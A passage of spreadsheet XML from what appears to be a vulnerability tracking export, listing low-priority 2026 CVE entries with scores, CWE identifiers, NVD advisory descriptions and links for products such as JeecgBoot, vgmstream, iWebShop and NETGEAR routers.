t="inlineStr"><is><t>NVD</t></is></c><c r="O2333" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2333" s="5" t="inlineStr" /><c r="Q2333" s="5" t="inlineStr"><is><t>CWE-266, CWE-284</t></is></c><c r="R2333" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in JeecgBoot up to 3.9.3. This vulnerability affects the function exportXls of the file jeecg-boot/jeecg-boot-module/jeecg-boot-module-airag/src/main/java/org/jeecg/modules/airag/llm/controller/AiragModelController.java. Such manipulation of the argument credential leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 3.9.5 is able to resolve this issue. The name of the patch is a2be896f753936956ee6863b632b8e5a0231345c. You should upgrade the affected component.</t></is></c><c r="S2333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86228</t></is></c></row><row r="2334"><c r="A2334" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2334" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2334" s="5" t="inlineStr"><is><t>CVE-2026-86232</t></is></c><c r="D2334" s="5" t="n"><v>2.1</v></c><c r="E2334" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2334" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2334" s="5" t="inlineStr" /><c r="H2334" s="5" t="n"><v>0.002</v></c><c r="I2334" s="5" t="inlineStr" /><c r="J2334" s="5" t="inlineStr" /><c r="K2334" s="5" t="inlineStr" /><c r="L2334" s="5" t="inlineStr" /><c r="M2334" s="5" t="inlineStr" /><c r="N2334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2334" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2334" s="5" t="inlineStr" /><c r="Q2334" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2334" s="5" t="inlineStr"><is><t>A weakness has been identified in itsourcecode Sales and Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/sup_del.php?type=supplier. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.</t></is></c><c r="S2334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86232</t></is></c></row><row r="2335"><c r="A2335" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2335" s="5" t="inlineStr"><is><t>CVE-2026-86512</t></is></c><c r="D2335" s="5" t="n"><v>2.1</v></c><c r="E2335" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2335" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2335" s="5" t="inlineStr" /><c r="H2335" s="5" t="n"><v>0.002</v></c><c r="I2335" s="5" t="inlineStr" /><c r="J2335" s="5" t="inlineStr" /><c r="K2335" s="5" t="inlineStr" /><c r="L2335" s="5" t="inlineStr" /><c r="M2335" s="5" t="inlineStr" /><c r="N2335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2335" s="5" t="inlineStr" /><c r="Q2335" s="5" t="inlineStr"><is><t>CWE-266, CWE-284</t></is></c><c r="R2335" s="5" t="inlineStr"><is><t>A vulnerability was identified in java-json-tools json-patch up to 1.13. This affects the function CopyOperation.apply/MoveOperation.apply of the file src/main/java/com/github/fge/jsonpatch/CopyOperation.java of the component Copy Move Operations. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t></is></c></row><row r="2336"><c r="A2336" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2336" s="5" t="inlineStr"><is><t>CVE-2026-86514</t></is></c><c r="D2336" s="5" t="n"><v>2.1</v></c><c r="E2336" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2336" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2336" s="5" t="inlineStr" /><c r="H2336" s="5" t="n"><v>0.003</v></c><c r="I2336" s="5" t="inlineStr" /><c r="J2336" s="5" t="inlineStr" /><c r="K2336" s="5" t="inlineStr" /><c r="L2336" s="5" t="inlineStr" /><c r="M2336" s="5" t="inlineStr" /><c r="N2336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2336" s="5" t="inlineStr" /><c r="Q2336" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="R2336" s="5" t="inlineStr"><is><t>A weakness has been identified in vgmstream up to r2117. This issue affects the function sscanf of the file src/meta/txth.c of the component txth-txtp. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 4669d37a6af94866f6f0628678f9f90d46954e8b. To fix this issue, it is recommended to deploy a patch.</t></is></c><c r="S2336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t></is></c></row><row r="2337"><c r="A2337" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2337" s="5" t="inlineStr"><is><t>CVE-2026-86515</t></is></c><c r="D2337" s="5" t="n"><v>2.1</v></c><c r="E2337" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2337" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2337" s="5" t="inlineStr" /><c r="H2337" s="5" t="n"><v>0.003</v></c><c r="I2337" s="5" t="inlineStr" /><c r="J2337" s="5" t="inlineStr" /><c r="K2337" s="5" t="inlineStr" /><c r="L2337" s="5" t="inlineStr" /><c r="M2337" s="5" t="inlineStr" /><c r="N2337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2337" s="5" t="inlineStr" /><c r="Q2337" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="R2337" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in vgmstream up to r2117. Impacted is the function add_entry of the file src/meta/txtp_parser.c of the component txtp. Such manipulation of the argument range_start/range_end leads to resource consumption. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 4b6a02dd1aff6428255db912563d77d4cb0a143e. It is advisable to implement a patch to correct this issue.</t></is></c><c r="S2337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86515</t></is></c></row><row r="2338"><c r="A2338" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2338" s="5" t="inlineStr"><is><t>CVE-2026-86517</t></is></c><c r="D2338" s="5" t="n"><v>2.1</v></c><c r="E2338" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2338" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2338" s="5" t="inlineStr" /><c r="H2338" s="5" t="n"><v>0.002</v></c><c r="I2338" s="5" t="inlineStr" /><c r="J2338" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K2338" s="5" t="inlineStr" /><c r="L2338" s="5" t="inlineStr" /><c r="M2338" s="5" t="inlineStr" /><c r="N2338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2338" s="5" t="inlineStr" /><c r="Q2338" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2338" s="5" t="inlineStr"><is><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is></c><c r="S2338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t></is></c></row><row r="2339"><c r="A2339" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2339" s="5" t="inlineStr"><is><t>CVE-2026-86518</t></is></c><c r="D2339" s="5" t="n"><v>2.1</v></c><c r="E2339" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2339" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2339" s="5" t="inlineStr" /><c r="H2339" s="5" t="n"><v>0.002</v></c><c r="I2339" s="5" t="inlineStr" /><c r="J2339" s="5" t="inlineStr" /><c r="K2339" s="5" t="inlineStr" /><c r="L2339" s="5" t="inlineStr" /><c r="M2339" s="5" t="inlineStr" /><c r="N2339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2339" s="5" t="inlineStr" /><c r="Q2339" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2339" s="5" t="inlineStr"><is><t>A vulnerability has been found in code-projects Student Crud Operation 1.0. This affects an unknown function of the file /edit.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="S2339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86518</t></is></c></row><row r="2340"><c r="A2340" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2340" s="5" t="inlineStr"><is><t>CVE-2026-86668</t></is></c><c r="D2340" s="5" t="n"><v>2.1</v></c><c r="E2340" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2340" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2340" s="5" t="inlineStr" /><c r="H2340" s="5" t="n"><v>0.003</v></c><c r="I2340" s="5" t="inlineStr" /><c r="J2340" s="5" t="inlineStr" /><c r="K2340" s="5" t="inlineStr" /><c r="L2340" s="5" t="inlineStr" /><c r="M2340" s="5" t="inlineStr" /><c r="N2340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2340" s="5" t="inlineStr" /><c r="Q2340" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="R2340" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in aircheng-org iWebShop-5 up to 5.15. The impacted element is the function uploadFile of the file controllers/pic.php. Such manipulation of the argument outerSrc/selectPhoto leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t></is></c></row><row r="2341"><c r="A2341" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2341" s="5" t="inlineStr"><is><t>CVE-2026-86674</t></is></c><c r="D2341" s="5" t="n"><v>2.1</v></c><c r="E2341" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2341" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2341" s="5" t="inlineStr" /><c r="H2341" s="5" t="n"><v>0.002</v></c><c r="I2341" s="5" t="inlineStr" /><c r="J2341" s="5" t="inlineStr" /><c r="K2341" s="5" t="inlineStr" /><c r="L2341" s="5" t="inlineStr" /><c r="M2341" s="5" t="inlineStr" /><c r="N2341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2341" s="5" t="inlineStr" /><c r="Q2341" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="R2341" s="5" t="inlineStr"><is><t>A vulnerability was found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is the function session_start of the file login.php. The manipulation results in session fixiation. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t></is></c></row><row r="2342"><c r="A2342" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2342" s="5" t="inlineStr"><is><t>CVE-2026-86675</t></is></c><c r="D2342" s="5" t="n"><v>2.1</v></c><c r="E2342" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2342" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2342" s="5" t="inlineStr" /><c r="H2342" s="5" t="n"><v>0.002</v></c><c r="I2342" s="5" t="inlineStr" /><c r="J2342" s="5" t="inlineStr" /><c r="K2342" s="5" t="inlineStr" /><c r="L2342" s="5" t="inlineStr" /><c r="M2342" s="5" t="inlineStr" /><c r="N2342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2342" s="5" t="inlineStr" /><c r="Q2342" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2342" s="5" t="inlineStr"><is><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is></c><c r="S2342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86675</t></is></c></row><row r="2343"><c r="A2343" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2343" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2343" s="5" t="inlineStr"><is><t>CVE-2026-8769</t></is></c><c r="D2343" s="5" t="n"><v>2.1</v></c><c r="E2343" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2343" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G2343" s="5" t="inlineStr" /><c r="H2343" s="5" t="n"><v>0.006</v></c><c r="I2343" s="5" t="inlineStr" /><c r="J2343" s="5" t="inlineStr" /><c r="K2343" s="5" t="inlineStr" /><c r="L2343" s="5" t="inlineStr"><is><t>npm:@ai-sdk/provider-utils</t></is></c><c r="M2343" s="5" t="inlineStr"><is><t>3.0.28, 4.0.33, 5.0.1</t></is></c><c r="N2343" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2343" s="5" t="inlineStr" /><c r="P2343" s="5" t="inlineStr" /><c r="Q2343" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R2343" s="5" t="inlineStr"><is><t>Versions of `@ai-sdk/provider-utils` before 3.0.28, from 4.0.0 before 4.0.33, and from 5.0.0 before 5.0.1 are vulnerable to uncontrolled resource consumption. The `createJsonResponseHandler`, `createJsonErrorResponseHandler`, and `createStatusCodeErrorResponseHandler` functions in `packages/provider-utils/src/response-handler.ts` read response bodies without a shared size limit, allowing a remote attacker with low privileges to cause excessive memory consumption. The exploit has been publicly disclosed and may be utilized.</t></is></c><c r="S2343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-8769</t></is></c></row><row r="2344"><c r="A2344" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2344" s="5" t="inlineStr"><is><t>CVE-2026-16003</t></is></c><c r="D2344" s="5" t="n"><v>2</v></c><c r="E2344" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2344" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G2344" s="5" t="inlineStr" /><c r="H2344" s="5" t="n"><v>0.001</v></c><c r="I2344" s="5" t="inlineStr" /><c r="J2344" s="5" t="inlineStr" /><c r="K2344" s="5" t="inlineStr" /><c r="L2344" s="5" t="inlineStr" /><c r="M2344" s="5" t="inlineStr" /><c r="N2344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2344" s="5" t="inlineStr" /><c r="Q2344" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="R2344" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to add an arbitrary process identifier to the driver's whitelist via a crafted IOCTL request by bypassing the driver's verification.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S2344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16003</t></is></c></row><row r="2345"><c r="A2345" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2345" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2345" s="5" t="inlineStr"><is><t>CVE-2026-85406</t></is></c><c r="D2345" s="5" t="n"><v>2</v></c><c r="E2345" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2345" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2345" s="5" t="inlineStr" /><c r="H2345" s="5" t="n"><v>0.002</v></c><c r="I2345" s="5" t="inlineStr" /><c r="J2345" s="5" t="inlineStr" /><c r="K2345" s="5" t="inlineStr" /><c r="L2345" s="5" t="inlineStr" /><c r="M2345" s="5" t="inlineStr" /><c r="N2345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2345" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2345" s="5" t="inlineStr" /><c r="Q2345" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="R2345" s="5" t="inlineStr"><is><t>A vulnerability has been found in Eleveo Quality Management 9.7.0. This vulnerability affects unknown code of the component Conversation Review. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t></is></c><c r="S2345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85406</t></is></c></row><row r="2346"><c r="A2346" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2346" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2346" s="5" t="inlineStr"><is><t>CVE-2026-85643</t></is></c><c r="D2346" s="5" t="n"><v>2</v></c><c r="E2346" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2346" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2346" s="5" t="inlineStr" /><c r="H2346" s="5" t="n"><v>0.002</v></c><c r="I2346" s="5" t="inlineStr" /><c r="J2346" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K2346" s="5" t="inlineStr" /><c r="L2346" s="5" t="inlineStr" /><c r="M2346" s="5" t="inlineStr" /><c r="N2346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2346" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2346" s="5" t="inlineStr" /><c r="Q2346" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2346" s="5" t="inlineStr"><is><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is></c><c r="S2346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85643</t></is></c></row><row r="2347"><c r="A2347" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2347" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2347" s="5" t="inlineStr"><is><t>CVE-2026-86150</t></is></c><c r="D2347" s="5" t="n"><v>2</v></c><c r="E2347" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2347" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2347" s="5" t="inlineStr" /><c r="H2347" s="5" t="n"><v>0.002</v></c><c r="I2347" s="5" t="inlineStr" /><c r="J2347" s="5" t="inlineStr" /><c r="K2347" s="5" t="inlineStr" /><c r="L2347" s="5" t="inlineStr" /><c r="M2347" s="5" t="inlineStr" /><c r="N2347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2347" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2347" s="5" t="inlineStr" /><c r="Q2347" s="5" t="inlineStr"><is><t>CWE-259, CWE-798</t></is></c><c r="R2347" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in Tenda CP3 27.5.57.101. Impacted is an unknown function of the file custom-x/softap/hostapd. Such manipulation of the argument wpa_passphrase leads to hard-coded credentials. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.</t></is></c><c r="S2347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86150</t></is></c></row><row r="2348"><c r="A2348" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2348" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2348" s="5" t="inlineStr"><is><t>CVE-2026-86226</t></is></c><c r="D2348" s="5" t="n"><v>2</v></c><c r="E2348" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2348" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2348" s="5" t="inlineStr" /><c r="H2348" s="5" t="n"><v>0.002</v></c><c r="I2348" s="5" t="inlineStr" /><c r="J2348" s="5" t="inlineStr" /><c r="K2348" s="5" t="inlineStr" /><c r="L2348" s="5" t="inlineStr" /><c r="M2348" s="5" t="inlineStr" /><c r="N2348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2348" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2348" s="5" t="inlineStr" /><c r="Q2348" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="R2348" s="5" t="inlineStr"><is><t>A security flaw has been discovered in Projectwolds Online Attendance System 1.0. Affected by this issue is some unknown functionality of the file profile.php. The manipulation of the argument email results in cross site scripting. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t></is></c><c r="S2348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86226</t></is></c></row><row r="2349"><c r="A2349" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2349" s="5" t="inlineStr"><is><t>CVE-2026-86644</t></is></c><c r="D2349" s="5" t="n"><v>2</v></c><c r="E2349" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2349" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2349" s="5" t="inlineStr" /><c r="H2349" s="5" t="n"><v>0.003</v></c><c r="I2349" s="5" t="inlineStr" /><c r="J2349" s="5" t="inlineStr" /><c r="K2349" s="5" t="inlineStr" /><c r="L2349" s="5" t="inlineStr" /><c r="M2349" s="5" t="inlineStr" /><c r="N2349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2349" s="5" t="inlineStr" /><c r="Q2349" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="R2349" s="5" t="inlineStr"><is><t>A vulnerability was determined in star7th showdoc up to 3.9.1. This vulnerability affects unknown code of the file web_src/public/editor.md/editormd.js of the component API Page Save Endpoint. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is able to resolve this issue. This patch is called a8ea1520850b4242f395247f72e87e597506cef0. Upgrading the affected component is recommended. The vendor confirms: "The fix [...] sets Mermaid `securityLevel` to `strict`, disables `htmlLabels`, and sanitizes rendered SVG with DOMPurify."</t></is></c><c r="S2349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86644</t></is></c></row><row r="2350"><c r="A2350" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2350" s="5" t="inlineStr"><is><t>CVE-2026-86667</t></is></c><c r="D2350" s="5" t="n"><v>2</v></c><c r="E2350" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2350" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2350" s="5" t="inlineStr" /><c r="H2350" s="5" t="n"><v>0.002</v></c><c r="I2350" s="5" t="inlineStr" /><c r="J2350" s="5" t="inlineStr" /><c r="K2350" s="5" t="inlineStr" /><c r="L2350" s="5" t="inlineStr" /><c r="M2350" s="5" t="inlineStr" /><c r="N2350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2350" s="5" t="inlineStr" /><c r="Q2350" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R2350" s="5" t="inlineStr"><is><t>A weakness has been identified in aircheng-org iWebShop-5 up to 5.15. The affected element is the function member_list of the file controllers/member.php. This manipulation of the argument Search causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S2350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86667</t></is></c></row><row r="2351"><c r="A2351" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2351" s="5" t="inlineStr"><is><t>CVE-2026-9215</t></is></c><c r="D2351" s="5" t="n"><v>1.8</v></c><c r="E2351" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2351" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G2351" s="5" t="inlineStr" /><c r="H2351" s="5" t="n"><v>0.001</v></c><c r="I2351" s="5" t="inlineStr" /><c r="J2351" s="5" t="inlineStr" /><c r="K2351" s="5" t="inlineStr"><is><t>netgear:xr1000, netgear:xr1000_firmware, netgear:xr1000v2, netgear:xr1000v2_firmware, netgear:xr500, netgear:xr500_firmware</t></is></c><c r="L2351" s="5" t="inlineStr" /><c r="M2351" s="5" t="inlineStr" /><c r="N2351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2351" s="5" t="inlineStr" /><c r="Q2351" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2351" s="5" t="inlineStr"><is><t>A cross site request forgery (CSRF) vulnerability in the listed NETGEAR models allows an attacker who can leverage social engineering techniques on a router administrator to tamper with router configuration and disrupt router operations with active assistance from the router administrator. There is no confidentiality impact due to this vulnerability.</t></is></c><c r="S2351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t></is></c></row><row r="2352"><c r="A2352" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2352" s="5" t="inlineStr"><is><t>CVE-2026-9216</t></is></c><c r="D2352" s="5" t="n"><v>1.2</v></c><c r="E2352" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2352" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G2352" s="5" t="inlineStr" /><c r="H2352" s="5" t="n"><v>0.002</v></c><c r="I2352" s="5" t="inlineStr" /><c r="J2352" s="5" t="inlineStr" /><c r="K2352" s="5" t="inlineStr"><is><t>netgear:rax30, netgear:rax30_firmware, netgear:rax35, netgear:rax35_firmware, netgear:rax38, netgear:rax38_firmware, netgear:rax40, netgear:rax40_firmware, netgear:raxe300, netgear:raxe300_firmware</t></is></c><c r="L2352" s="5" t="inlineStr" /><c r="M2352" s="5" t="inlineStr" /><c r="N2352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2352" s="5" t="inlineStr" /><c r="Q2352" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R2352" s="5" t="inlineStr"><is><t>An insufficient input validation vulnerability in the listed NETGEAR RAX series models allows a network-adjacent attacker having network access (such as WiFi credentials) to crash the router's management UI. There is no confidentiality or integrity impact. A crash of the router's management UI does not impact the availability of the router's core services like WiFi network.</t></is></c><c r="S2352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t></is></c></row><row r="2353"><c r="A2353" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2353" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2353" s="5" t="inlineStr"><is><t>CVE-2025-59057</t></is></c><c r="D2353" s="5" t="inlineStr" /><c r="E2353" s="5" t="inlineStr" /><c r="F2353" s="5" t="inlineStr" /><c r="G2353" s="5" t="inlineStr" /><c r="H2353" s="5" t="n"><v>0.005</v></c><c r="I2353" s="5" t="inlineStr" /><c r="J2353" s="5" t="inlineStr" /><c r="K2353" s="5" t="inlineStr" /><c r="L2353" s="5" t="inlineStr"><is><t>npm:@remix-run/react, npm:react-router</t></is></c><c r="M2353" s="5" t="inlineStr"><is><t>2.17.1, 7.9.0</t></is></c><c r="N2353" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2353" s="5" t="inlineStr" /><c r="P2353" s="5" t="inlineStr" /><c r="Q2353" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2353" s="5" t="inlineStr"><is><t>A XSS vulnerability exists in in React Router's `meta()`/`&lt;Meta&gt;` APIs in [Framework Mode](https://reactrouter.com/start/modes#framework) when generating `script:ld+json` tags which could allow arbitrary JavaScript execution during SSR if untrusted content is 